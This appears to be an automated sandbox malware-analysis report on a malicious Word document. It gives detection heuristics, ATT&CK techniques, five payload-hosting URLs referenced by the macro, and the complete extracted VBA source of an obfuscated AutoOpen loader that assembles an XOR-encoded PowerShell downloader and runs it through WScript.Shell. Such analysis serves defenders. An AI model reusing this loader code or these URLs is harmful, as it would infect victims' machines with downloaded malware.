MALICIOUS
352
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1204.002 Malicious File
The sample contains a critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER heuristic, indicating an obfuscated auto-exec VBA loader. The VBA script uses CreateObject and Shell() calls, and decodes URLs for a PowerShell loader. The script reconstructs the string "wershell . ( $SHe] + $sHellid[13] + 'X' ) ( ( '103X43>23Q17I126-45Q38j52X110m44-33", which is part of a PowerShell command to execute a payload. The embedded URLs are likely the sources for this payload.
Heuristics 11
-
ClamAV: Doc.Dropper.Agent-6601909-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6601909-0
-
VBA macros detected medium 6 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBAMatched line in script
HIdiw = WTGMQ / NwSlCh + 69619 + fpHOOT * (ODXmjj - zfQspm + (2198 - wYoBSk * BRtdnd + BPPdS)) pinaL = OuVsK + CreateObject(Chr(vbKeyW) + Chr(vbKeyS) + "cript.shell").Run(FDPCi + Chr(vbKeyP) + powoIZ + Chr(vbKeyO) + ZXHabCrIobC + FXFHdskGw, 467923949 - 467923949) wvBzq = WWUVo / fruSU + 35352 + BYLCM * (uDUWh - zsLUkO + (84022 - jKUqE * qQQLf + Fhzwm)) -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
HIdiw = WTGMQ / NwSlCh + 69619 + fpHOOT * (ODXmjj - zfQspm + (2198 - wYoBSk * BRtdnd + BPPdS)) pinaL = OuVsK + CreateObject(Chr(vbKeyW) + Chr(vbKeyS) + "cript.shell").Run(FDPCi + Chr(vbKeyP) + powoIZ + Chr(vbKeyO) + ZXHabCrIobC + FXFHdskGw, 467923949 - 467923949) wvBzq = WWUVo / fruSU + 35352 + BYLCM * (uDUWh - zsLUkO + (84022 - jKUqE * qQQLf + Fhzwm)) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
HIdiw = WTGMQ / NwSlCh + 69619 + fpHOOT * (ODXmjj - zfQspm + (2198 - wYoBSk * BRtdnd + BPPdS)) pinaL = OuVsK + CreateObject(Chr(vbKeyW) + Chr(vbKeyS) + "cript.shell").Run(FDPCi + Chr(vbKeyP) + powoIZ + Chr(vbKeyO) + ZXHabCrIobC + FXFHdskGw, 467923949 - 467923949) wvBzq = WWUVo / fruSU + 35352 + BYLCM * (uDUWh - zsLUkO + (84022 - jKUqE * qQQLf + Fhzwm)) -
Payload URL decoded from an encoded PowerShell loader (5 URLs) high OLE_VBA_ENCODED_PS_DROPPER_URLA VBA macro assembles (from literals scattered across helper functions) a WScript.Shell command that runs a PowerShell stage-2 loader whose download URL is hidden in a numeric char-code array — decoded at runtime by [char]($_ -bxor k) (or +k / -k) after splitting on obfuscated delimiters. The decoded hosts (often an @-separated fallback list dropped to %TEMP% and executed) are the next-stage payload URLs, never contiguous on disk; surfaced as IOCs. Self-validating: only a transform yielding a valid host URL is reported.
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.asifabih.com/jzo/ Referenced by macro
- http://www.dispozicija.viamedia.ba/JpDFY/Referenced by macro
- http://www.disp.viamedia.ba/EdsQhMy1/Referenced by macro
- http://www.bodyarmor.nu/PNNma/Referenced by macro
- http://www.anadolu-yapi.com/U4/Referenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12889 bytes |
SHA-256: dea5ec0497f1073351279df4ee064d22cdc73a36966fc1fc4e087ad5da4055a5 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
264 of 437 identifiers look randomly generated (e.g. 'dhMFmfjjsJdWf') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "TjSpPTVmMA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
DviKAw = (83353 / IkWns) - 52102 - 87069
DaWzt = (96278 / rhZMrp) - 4900 - 64052
AORLV = (30200 / uhpTS) - 18714 - 33717
KjVsZS = (92160 / RCApa) - 9177 - 34667
OVXSBbFTzTb (PJpwSu + dzUYtKDd + UIosqizH)
GEDNH = (64017 / HDLId) - 46921 - 45172
qbfoQ = (65607 / BstiO) - 52864 - 98959
End Sub
Attribute VB_Name = "dhMFmfjjsJdWf"
Function PJpwSu()
On Error Resume Next
OLlGdO = (sJhKV * 91514 * 90914 + MwMCw - 7750 - YwiOsQ * TvfPUo / WWRzn * (bHczm + Sviwi - 36918 * lmnXO))
jTZIOC = ONlBw - lzzGQ + uDdHdv / 23046 + zkpnT - UUHfLl
AqmfGb = (kqZvF * 20114 * 98731 + RWkcT - 97103 - kwwvwC * jwDbnE / UzrKSh * (IDdIW + VQnmCB - 7586 * piKdE))
QjRTQw = "wers" + "hell" + " " + " " + " ." + Chr(40) + " $SHe" + "llid[1"
nntuhT = (zDkaQ * 94066 * 46338 + nBizK - 60430 - hJSkuB * iHhijN / TjPwVB * (KOwdji + kjLBF - 18216 * jcwYz))
AiRvp = (ZCqsql * 55890 * 16189 + TDrIv - 96133 - OrnidA * iOPDF / iwjWs * (GzRpJ + vHhfP - 9371 * NXPaHK))
rdWvRw = (sRBQr * 53955 * 86732 + nbUJS - 21851 - YmAfi * hhNcw / LzmbRZ * (uUAkMd + PXBjvo - 30071 * EkvmRK))
cshNK = (USSCo * 56628 * 95237 + vTGOT - 47894 - YWhiDr * GSYWiI / VRQVdn * (QINbL + oIpJfu - 57348 * VAiHN))
PCqwPKMT = "]" + Chr(43) + "$sHe" + "llid[1" + "3]" + Chr(43) + "'X'" + Chr(41) + " " + Chr(40) + Chr(40) + " '1" + "03X43" + ">23Q17I12" + "6-45Q" + "38j5" + "2X11" + "0m44-33"
zJjpW = (ImDAiU * 47411 * 90093 + WGVww - 94710 - iCJRnJ * HzDCI / lFSAI * (mZjzL + JZsNKA - 49070 * BijfE))
HdaiXs = (XWVQjr * 56623 * 94179 + idisi - 6279 - LOrsOV * LjqUr / PadDXK * (uoIWt + Ychdj - 6221 * iPTfz))
mwCbSP = (TRnUqm * 20937 * 43730 + DzmdkH - 87860 - DcEJHY * vJKAdd / tOZGb * (pJntij + iRVOiC - 30801 * qLaMs))
bZiDTijC = "Q41j38k3" + "2m55" + "X99A13-38" + "j55,109" + "I20j3" + "8,33,0>4" + "7Q42>38>4" + "5Q55Q1" + "20m1" + "03k41-0," + "54A126" + ">100"
tjQdct = (wbjWK * 44562 * 82772 + VBDCIk - 59323 - ifuRF * bYMAB / mNXXDW * (TMXUR + LKARCb - 24312 * Lizib))
bKtUfE = (DdfTw * 87029 * 79326 + iauEd - 76965 - VaNzCD * tiaQcL / lLzdtR * (wjTiBz + lwvvtf - 78237 * GfCUF))
YtdqQBPVtu = "k43-55>5" + "5j51X121," + "108m10" + "8-52,5" + "2m52Q109" + ">34,4" + "8,42" + "A37X3"
bErXZM = (HwzjOp * 7843 * 8634 + FjLYX - 18367 - ipwzsw * aPCWc / ujQRK * (XmZXaS + iuAVA - 19632 * RIhcM))
ZipCpz = (BFQpoH * 95029 * 84371 + Pcikm - 69370 - ZjpTOj * zZwRv / ljuji * (JppnoV + FtimB - 5029 * vQTzjY))
LJJVA = (Hijwl * 67584 * 21692 + LKcpt - 14639 - HJZoba * ZobMWS / NLvbD * (WlDpd + DWmGm - 30798 * ZEAkj))
lZRLT = (mbYSuO * 51717 * 72870 + JRWjX - 27674 - ZtCMK * lzoEL / mNHMGr * (HVhbmj + QzPFfb - 92353 * zXJHR))
IYLamGbFsEf = "4Q33Q42I" + "43I109m" + "32k44" + "k46A108I4" + "1>57" + "m44m108" + "Q3I4" + "3A55A55A" + "51A121k" + "108j1"
WKBAi = (GvYwzC * 83548 * 14733 + twRosM - 52708 - waYnMw * pvDvi / VzEdj * (YizXDX + WqhMQ - 12363 * OCaFzt))
EcOjZ = (vwHcN * 39553 * 67947 + Znhizs - 23316 - wOtia * TZOBC / uPFVfb * (ztvWPV + YNnbIz - 94234 * izmqpl))
QrpBo = (jiwFpa * 88678 * 68382 + AwGiJU - 74967 - PGIVQv * FfGYZv / TTYNwo * (NPAjWw + Rntwdw - 49448 * fLQnwA))
JDwvc = (XzNKM * 28621 * 6403 + BCVPp - 50741 - Hjnpk * TWwdm / IVtZHv * (wrUBE + rwAYjk - 8963 * wBUKG))
AlOdCI = "08A52X52X" + "52X109I" + "39m42k48k" + "51X44k5" + "7A42A32Q4" + "2A41j34" + "I109m5" + "3>42X" + "34Q46X38" + ">39X4" + "2m34m109"
PJpwSu = QjRTQw + PCqwPKMT + bZiDTijC + YtdqQBPVtu + IYLamGbFsEf + AlOdCI
OVijiO = (aKOGz * 28810 * 90803 + zaKbI - 99015 - Gqhvp * DwJDQu / FXczwf * (lMNQYi + cCEHd - 81111 * OswiZ))
MSmhK = (LDVwMZ * 5727 * 86152 + MdkFmn - 86249 - zHlGi * mKWKhJ / iPOfbY * (DkMbGI + LBXwaT - 30105 * ZYccOj))
MECiT = (EbzLfd * 5496 * 55317 + dRXKba - 91428 - vnEwq * iQWwZY / KiEhJ * (Fsczn + UOjLP - 10259 * RzHvPA))
End Function
Function dzUYtKDd()
On Error Resume Next
zVUEOz = (HEoUz * 26504 * 41222 + FjVPf - 83207 - EZPJS * JXCfAN / SCWYop * (XCKWbf + uPJARn - 85983 * uoEhi))
cdUjJq = (uWHnKW * 5664 * 64837 + Ioknb - 75777 - MbHRYL * AOJvd / ErcVdl * (OHUNV + CHmAw - 38448 * jIHCYN))
uIidE = (TjTdRZ * 81235 * 24412 + nRYWQ - 94802 - HtcHI * mojwF / wTVJUh * (zrloXa + nHzcrf - 42433 * BlAwiP))
lpzAjm = (KzbqB * 63197 * 3861 + timDO - 15744 - fjZwCH * TGGrqQ / Xaztr * (LYblL + fuWui - 70057 * sJPak))
hvuSJPJqhj = "m33X34-1" + "08j9,5" + "1A7j5Q2" + "6,10" + "8-3,4" + "3-55j55X" + "51-121A" + "108A1" + "08j52j52" + "I52>"
GjmRun = (aUoFA * 5170 * 16610 + mdbwO - 4174 - jPUQit * aioKM / JoTrqS * (jLDcw + FHfMA - 43797 * OwWwdI))
YBaZz = (QLOKq * 29542 * 65089 + HtwNJ - 519 - ONboB * jZzQDI / jTnvL * (qalld + zDAJc - 98736 * OuJoz))
OnOjiRbfTib = "109,39j42" + "Q48Q51>10" + "9Q53X42X3" + "4X46k38X" + "39,42" + "-34Q109,3" + "3-34" + "Q108I6" + "A39>48," + "18-43Q1" + "4k58"
pRUWZ = (NLjzY * 80958 * 88002 + wboGS - 7157 - iEnKHj * TSbjFT / AkBlzw * (oJcBkp + GwbUTm - 12645 * hMSWf))
JRppOz = (JkHvdJ * 46913 * 22772 + UNoGuS - 75370 - QjMRWN * GLoBlm / CFIWc * (aSEYLE + uXGAr - 58923 * Zinhm))
WokZb = (rmVUHE * 89919 * 91316 + JWtGM - 37127 - Omhin * pSbQr / mnQKO * (PMGzLi + RVDwd - 47244 * wWZwsw))
vXcTahFUSFS = "A114m108k" + "3A43m55k" + "55j51m121" + ">108k108" + "k52k5" + "2Q52" + "m109" + "I33j44m3" + "9I58" + "k34A49Q" + "46-44I"
JatMKV = (qJEdfM * 67308 * 54248 + AzihoD - 87658 - piUFX * XUoQo / rlkMAl * (TQzbY + uvAWSE - 12498 * UXfBlT))
CtqMYI = (sLfdz * 13140 * 88581 + awTVh - 74190 - wsMYQ * RSSTb / DFVVn * (wKkzu + rcKYtd - 77668 * KjvwA))
Irwusu = (NShCC * 50184 * 15592 + DwXdOW - 97625 - MhCXO * KOSCl / GfdpA * (nDlCEH + fcENp - 70283 * JVjMq))
RwwIXYiXptt = "49,109X4" + "5j54A10" + "8Q19m13m1" + "3Q46" + ">34Q108" + "-3Q43,55Q"
HSjAo = (lXTich * 67931 * 90385 + KdvKib - 11982 - cRbwk * Qwdjiw / SETMu * (lfNDb + lZjvM - 33135 * BRGiMB))
NQSbG = "55>51X121" + ">108k108," + "52j52I5" + "2j109k" + "34m45>34" + "-39X4" + "4X47-54j1"
jzAEw = (rZcwo * 42665 * 39604 + POzkz - 42880 - DQPwuB * VGLud / vNCWPT * (KSNcLj + rUNQAF - 40500 * ikHDPj))
ENOPuuV = "10>58X34" + "-51k42>10" + "9,32Q44m4" + "6k108I2" + "2X119,10" + "8j100" + "m109I16X" + "51Q47" + ",42j55>1"
bnQoc = (TSkft * 17435 * 97003 + HQWwT - 84962 - voETi * zYMQNV / sdjGDs * (WYjIT + bNGnZa - 43146 * jwMUtX))
GYUqR = (GMAuC * 22575 * 77119 + PBnCR - 12069 - wzDtl * aZjHtu / aNpAzA * (FkjvMD + tSMMM - 57731 * JaQwj))
uslZCL = (UjoXlD * 75222 * 72300 + GUBtu - 88114 - OQiRO * EBGwb / SvVoIj * (UQzufz + pJMCd - 84966 * UXJYu))
XOfnKh = (jPuboA * 42893 * 15346 + zpGkRZ - 82228 - wBMiUl * UibBR / jjujXX * (zhlKqR + ERldz - 46427 * oIUzPd))
EiOXiSUd = "07>100Q" + "3A100I106" + ",120k103" + "A8X37-23" + "k99k1" + "26A99A100" + "m119A12"
jsqfrR = (lYmqA * 94067 * 71846 + ulTaQp - 40702 - SlaFK * EHaSsZ / fYGum * (ZVIjwG + FSGoYs - 28159 * XtQMLq))
LPImT = (RQQwK * 2890 * 18666 + iTsQV - 10352 - pYhAiX * GnzjC / Smujf * (RrvMfT + NHCzi - 53379 * YWqalp))
arDQH = (DMzjId * 98928 * 41053 + uvrCTj - 70628 - NQKou * jYVJr / bdwjA * (dBCVz + iIMLqV - 59816 * qVqzz))
QmIRuq = (MmDQI * 96381 * 22988 + IhhTj - 12196 - uhQqR * YETYSS / wmvIh * (GaJvVE + MIOwIz - 62554 * rbAEZP))
PiELiP = (MjdMv * 89378 * 19174 + iwUpl - 2928 - tALbIf * halEqt / suHqFt * (ufShN + mNqBid - 56150 * EAGGhX))
jZNLwGCnq = "2-113I1" + "00X120," + "103I37-1" + "4-11-12" + "6k103A" + "38j4" + "5A53>1"
ELusZM = (BwLzk * 90545 * 51256 + QVFzT - 35139 - sKWRbj * njijL / dDuiR * (ccsip + flWzi - 68747 * hJSkW))
cBawJ = (wYJlon * 88522 * 86962 + BjJKG - 8063 - OIKbww * zqwOh / LFVLZ * (doznE + cdYEjZ - 93949 * mmSoh))
wrjuHdjCj = "21j55I38" + "m46X5" + "1,104" + "A100," + "31m100j" + "104X103k" + "8>37" + "A23,104" + ",100Q" + "109k38>" + "59-3" + "8Q10"
dzUYtKDd = hvuSJPJqhj + OnOjiRbfTib + vXcTahFUSFS + RwwIXYiXptt + NQSbG + ENOPuuV + EiOXiSUd + jZNLwGCnq + wrjuHdjCj
lNuCE = (GpzlM * 88076 * 94962 + isTqr - 10424 - ZrKjdq * YAhqw / szOUD * (zCqhw + vXPizp - 64684 * TLWkSa))
cJiTBj = (YNaaj * 31819 * 79751 + zbhPv - 91065 - pwuMd * KSYWj / zTOPn * (dNIWH + GsqSI - 78079 * pzbTjY))
End Function
Function UIosqizH()
On Error Resume Next
zDVvk = (jiwno * 10485 * 67851 + KNpiSw - 82055 - sJOsj * dCdtFl / dbzKwj * (BCtik + MWdrrw - 50252 * LMhssG))
VnBEwoSVa = "0I120" + "I37A4" + "4A49k3" + "8-34j32Q4" + "3>107Q10" + "3j14-34," + "47Q99"
vAzrh = (pXUQnw * 81348 * 30099 + IEQGZl - 3603 - LsSPR * FZCEs / inlikn * (WhmzU + zkoquX - 47675 * slwPWX))
PfwYM = "I42," + "45j99X103" + "A41Q" + "0m54>1" + "06-56m55j" + "49k58,5" + "6I103>43>" + "23A17" + ",109"
VIWCWi = (nancT * 91066 * 59785 + vLrSnj - 96249 - MrKkZ * sTYvpi / PFrlq * (rQaEC + rQSUBj - 99039 * wJLMz))
kuwRFV = (lWlRf * 48925 * 47447 + zSUiQj - 16155 - TFlBmP * POIrC / WfsPV * (YlHOT + FREDX - 95818 * cMiLT))
iTDYGw = (jGAhw * 27583 * 12436 + lnHIhc - 48337 - XOpLRF * inuYJw / jwfXk * (UUjlR + YXEoO - 32501 * UjJQk))
BGEEWGQ = "-7m44Q52A" + "45-47>44X" + "34m39Q5," + "42k47," + "38m107A" + "103>14X"
iqhMfb = (IaCXFj * 76599 * 53825 + DlMtTE - 54835 - JChKO * oljNd / qjKCf * (QpUkP + uwsjL - 82703 * dNQDc))
VtCpz = (OHLdKs * 24421 * 58939 + fEuLh - 42629 - zfIAb * WfuUKz / bjvUJJ * (tLDYw + ddLqrs - 81381 * tWhwUY))
uDNlYS = (OsUbK * 27122 * 32426 + nzYnaP - 31194 - FZpCzz * jhHqIN / iMzvjF * (HBcup + SipTYi - 47164 * LjQLO))
ViqOWvtDh = "34-4" + "7I111I" + "99j103I" + "37A1" + "4>11" + "m106A1" + "20j16m5" + "5-34>49Q5"
vRXVj = (GUvKD * 69933 * 83887 + dKWIjG - 47960 - ccwMjB * bWNhs / WvwbOP * (GfHBJP + TQjIdj - 26910 * uWWpFM))
wjKpFD = (sLGkTm * 33249 * 32695 + rpbBl - 6424 - DcsjAU * uqsZrG / zmVaaJ * (mqNTh + kkmzqt - 5383 * MNXzX))
CXIbLO = (pfjKG * 95437 * 46826 + HJZHC - 84341 - SioTWc * jRnkOw / mOPER * (ooTSK + WIBpKl - 3085 * Eimsr))
pCzHHO = (hUqlb * 95035 * 41064 + CUapKn - 9029 - JihAa * YJbmr / wKITE * (Bnnzms + ZTVfX - 18579 * lwqcZN))
BuvmcK = "5k110j19" + "m49j" + "44Q32m38" + "m48j4" + "8Q99>103" + "m37,14" + "I11-" + "120m33k" + "49j3" + "8,34A40," + "120-6" + "2I32"
aNaKYu = (FaKuE * 31685 * 72807 + MTpuJD - 89846 - zDjkYz * DcNsQA / WGqhjX * (wwqbiL + ilCqfi - 54479 * rKiHz))
cdTiOiwhpXw = "Q34k55" + ">32j43X5" + "6I62A62'" + " -sPL" + "it'J' -S" + "PliT',' " + "-Split" + " 'K'-sPlI" + "t'-'-sP" + "lIT '"
wwfRz = (DltQV * 19165 * 69921 + buoONd - 29412 - ZkHcz * vrAfI / UKvME * (zDbjRQ + lJONSF - 90595 * vYvJV))
fDuKGA = (uNBwmq * 74614 * 91188 + TfRZj - 97992 - iuhsWz * SGUcG / bMBowL * (psznmt + WwaZC - 62375 * LQYIK))
zZbfSw = (WqdTq * 34633 * 35167 + aDzwFC - 46797 - uqnGCm * ZZfLR / jqwwS * (loVXI + dGMqrl - 57069 * phpir))
XViSwi = (bXXDw * 10037 * 81026 + pmwUr - 21266 - kVRQP * DYZXhH / FEshz * (aSIbdB + BoVzn - 50205 * VlIBjT))
irSNj = (wGicd * 41139 * 99895 + pvuFdr - 58907 - jvaZQ * wdjlQ / GBjZGj * (PUzvh + bWVdCh - 8185 * PLWnGt))
pBPpBh = (RwbKj * 61648 * 23355 + qSrjMJ - 65101 - iZNtYl * CiENN / TbONVr * (lHVPw + icSoN - 50146 * XjQoo))
iMBJC = "I'-sPLIT" + "'x'-SPli" + "t 'M' " + "-spLIT '" + "Q' -" + "SPLIT 'A'" + "-sPLIT" + " '>'|% {" + " [ChaR] " + Chr(40) + " $_-BXor"
wsFNm = (OUzthO * 97558 * 67773 + ttosaz - 57437 - LErqJ * zpaFTA / bSpiH * (CoWTQ + XtNFqj - 3367 * otJuw))
imrFKJk = " " + Chr(34) + "0x43" + Chr(34) + " " + Chr(41) + "}" + Chr(41) + "-join" + " '' " + Chr(41) + ""
UIosqizH = VnBEwoSVa + PfwYM + BGEEWGQ + ViqOWvtDh + BuvmcK + cdTiOiwhpXw + iMBJC + imrFKJk
DGIii = 91565 + awKTq - (51907 * okaOm / 86007 * kkWSiP + (JukCaC / 69969 / Kltcc / GfQLrZ))
End Function
Attribute VB_Name = "GpAuCNSBAIQ"
Function OVXSBbFTzTb(ZXHabCrIobC)
On Error Resume Next
ZvdUl = ltnNmb / WVwDo + 53564 + FSciU * (YchDpN - iHwjJl + (77166 - MCnIbs * fBFcwN + GTzzqS))
jXYhp = YRtDn / tPpVtC + 55477 + fwMRjf * (dhJuV - zTPjtC + (63104 - jLZIj * qddGo + MhlKGA))
kkISst = ZmzAwp / mnJzZK + 98651 + DGfYS * (EdsrSL - aQqqMu + (8415 - GntWlw * zDkEw + hCmTaN))
HIdiw = WTGMQ / NwSlCh + 69619 + fpHOOT * (ODXmjj - zfQspm + (2198 - wYoBSk * BRtdnd + BPPdS))
pinaL = OuVsK + CreateObject(Chr(vbKeyW) + Chr(vbKeyS) + "cript.shell").Run(FDPCi + Chr(vbKeyP) + powoIZ + Chr(vbKeyO) + ZXHabCrIobC + FXFHdskGw, 467923949 - 467923949)
wvBzq = WWUVo / fruSU + 35352 + BYLCM * (uDUWh - zsLUkO + (84022 - jKUqE * qQQLf + Fhzwm))
hwGBzn = oYUXK / cLWrE + 42035 + CZimJr * (rSvOhr - KKdIUC + (60599 - SvtBb * tLFsR + lHRTsI))
ajLfzm = JszjB / iaNAIi + 3078 + sCwEh * (AcLTtO - zEqnn + (95605 - HBfHbY * pCdKd + iihOb))
Ujjim = jlVWNU / VzrWpc + 16854 + LaiJP * (iPWbLX - LbUBUo + (84086 - TfQpzt * qKZwHv + GzUXo))
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.